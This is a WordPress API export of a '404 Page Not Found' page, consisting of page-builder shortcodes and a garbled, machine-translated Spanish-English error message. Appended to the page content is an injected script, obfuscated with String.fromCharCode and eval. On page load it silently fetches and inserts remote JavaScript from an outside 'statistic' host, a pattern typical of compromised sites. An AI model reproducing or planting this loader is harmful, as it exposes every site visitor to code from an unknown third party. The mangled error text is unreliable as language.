{"id":13812,"date":"2023-07-25T12:39:45","date_gmt":"2023-07-25T10:39:45","guid":{"rendered":"https:\/\/portvellbcn.cat\/404-2\/"},"modified":"2023-07-25T12:40:35","modified_gmt":"2023-07-25T10:40:35","slug":"404-2","status":"publish","type":"page","link":"https:\/\/portvellbcn.cat\/es\/404-2\/","title":{"rendered":"404"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_section full_width=\u00bbstretch_row\u00bb full_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1492436674882{margin-top: -45px !important;margin-bottom: -80px !important;background-image: url(http:\/\/choroswp.aisconverse.com\/wp-content\/uploads\/2017\/04\/245.jpg?id=1824) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb][vc_row full_width=\u00bbstretch_row\u00bb full_height=\u00bbyes\u00bb css=\u00bb.vc_custom_1491389737841{background-color: rgba(0,0,0,0.69) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;*background-color: rgb(0,0,0) !important;}\u00bb][vc_column][vc_row_inner][vc_column_inner width=\u00bb1\/2&#8243; offset=\u00bbvc_col-lg-offset-3 vc_col-md-offset-3 vc_col-sm-offset-3&#8243;][vc_custom_heading text=\u00bb404&#8243; font_container=\u00bbtag:h1|font_size:150|text_align:center|color:%23ffffff\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text css=\u00bb.vc_custom_1491390203070{margin-top: 90px !important;}\u00bb]<\/p>\n<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">PAGE NOT FOUND<\/span><\/h1>\n<p style=\"text-align: center;\"><span style=\"color: #808080;\">Unfortunadamente el contento de usted es looking para que no est\u00e1 herido o traslado de la p\u00e1gina no est\u00e1 creado. Estar\u00e1 bien en misspelling en su web address or you mai have clicked en link para contener que no longer exists.<\/span><\/p>\n<p>[\/vc_column_text][vc_btn title=\u00bbBACK TO HOMBRE\u00bb style=\u00bbgradient\u00bb gradient_color_1=\u00bbtheme_special_color_1&#8243; gradient_color_2=\u00bbtheme_special_color_2&#8243; shape=\u00bbround\u00bb align=\u00bbcenter\u00bb link=\u00bburl:%2F|\u00bb css=\u00bb.vc_custom_1491390196473{margin-top: 40px !important;}\u00bb][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][\/vc_section]<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_section full_width=\u00bbstretch_row\u00bb full_height=\u00bbyes\u00bb content_placement=\u00bbmiddle\u00bb css=\u00bb.vc_custom_1492436674882{margin-top: -45px !important;margin-bottom: -80px !important;background-image: url(http:\/\/choroswp.aisconverse.com\/wp-content\/uploads\/2017\/04\/245.jpg?id=1824) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\u00bb][vc_row full_width=\u00bbstretch_row\u00bb full_height=\u00bbyes\u00bb css=\u00bb.vc_custom_1491389737841{background-color: rgba(0,0,0,0.69) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;*background-color: rgb(0,0,0) !important;}\u00bb][vc_column][vc_row_inner][vc_column_inner width=\u00bb1\/2&#8243; offset=\u00bbvc_col-lg-offset-3 vc_col-md-offset-3 vc_col-sm-offset-3&#8243;][vc_custom_heading text=\u00bb404&#8243; font_container=\u00bbtag:h1|font_size:150|text_align:center|color:%23ffffff\u00bb google_fonts=\u00bbfont_family:Nova%20Mono%3Aregular|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text css=\u00bb.vc_custom_1491390203070{margin-top: 90px !important;}\u00bb] PAGE NOT FOUND Unfortunadamente el contento de usted es looking para que no est\u00e1 herido o traslado de la p\u00e1gina no est\u00e1 creado. Estar\u00e1 bien en misspelling en su web address or you mai have clicked en link para contener que no longer exists. [\/vc_column_text][vc_btn title=\u00bbBACK TO HOMBRE\u00bb style=\u00bbgradient\u00bb gradient_color_1=\u00bbtheme_special_color_1&#8243; gradient_color_2=\u00bbtheme_special_color_2&#8243; shape=\u00bbround\u00bb align=\u00bbcenter\u00bb link=\u00bburl:%2F|\u00bb css=\u00bb.vc_custom_1491390196473{margin-top: 40px !important;}\u00bb][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][\/vc_section]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-13812","page","type-page","status-publish","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/comments?post=13812"}],"version-history":[{"count":0,"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/pages\/13812\/revisions"}],"wp:attachment":[{"href":"https:\/\/portvellbcn.cat\/es\/wp-json\/wp\/v2\/media?parent=13812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}